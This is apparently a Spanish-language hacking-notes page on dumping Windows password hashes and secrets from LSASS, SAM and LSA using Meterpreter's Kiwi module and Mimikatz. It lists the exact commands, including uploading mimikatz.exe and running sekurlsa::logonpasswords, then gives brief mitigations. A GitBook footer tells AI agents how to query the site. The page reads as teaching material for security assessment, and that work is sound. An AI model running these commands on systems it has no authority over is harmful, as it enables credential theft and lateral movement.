> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-hash-dumping-with-mimikatz.md).

# Volcado de hashes de Windows con Mimikatz

Mimikatz y Meterpreter Kiwi pueden extraer secretos de Windows de LSASS, la base de datos SAM y los secretos de LSA. Use los resultados para validar el impacto del acceso local o de una sesión comprometida.

## Módulo Kiwi de Meterpreter

```
load kiwi
```

<figure><img src="/files/b84216fd5dbeca2bba0d974eb91239928fa720e0" alt="Loading Kiwi in Meterpreter"><figcaption></figcaption></figure>

Lista credenciales accesibles:

```
creds_all
```

<figure><img src="/files/ea733a01761d0ac021f775346c3ababb2a524ab2" alt="Kiwi credential listing"><figcaption></figcaption></figure>

## Volcar SAM y secretos de LSA

```
lsa_dump_sam
```

<figure><img src="/files/a7253107eabeafc84611cfd92b375b235e1c6ebf" alt="SAM dump with Kiwi"><figcaption></figcaption></figure>

```
lsa_dump_secrets
```

<figure><img src="/files/cb8d0a0d1417de7e1dfe1f943da56a5b5a8bf85b" alt="LSA secrets dump with Kiwi"><figcaption></figcaption></figure>

## Ejecutar Mimikatz

```
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords
```

<figure><img src="/files/299948e3294f8a4ebbc886fa53100c9dc1ac6fd3" alt="Uploading Mimikatz"><figcaption></figcaption></figure>

<figure><img src="/files/ec60f7b00adc0284a5348394d3b189282366a4ab" alt="Mimikatz SAM and secrets commands"><figcaption></figcaption></figure>

<figure><img src="/files/04f150ce8d0e427e41107ebabde608b98bab1901" alt="Mimikatz credential output"><figcaption></figcaption></figure>

## Puntos clave

* LSASS puede contener credenciales de sesiones de inicio de sesión activas.
* SAM contiene hashes NTLM de las cuentas locales.
* Mitigue con Credential Guard, reduzca la exposición de administradores locales y supervise el acceso a LSASS.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-hash-dumping-with-mimikatz.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
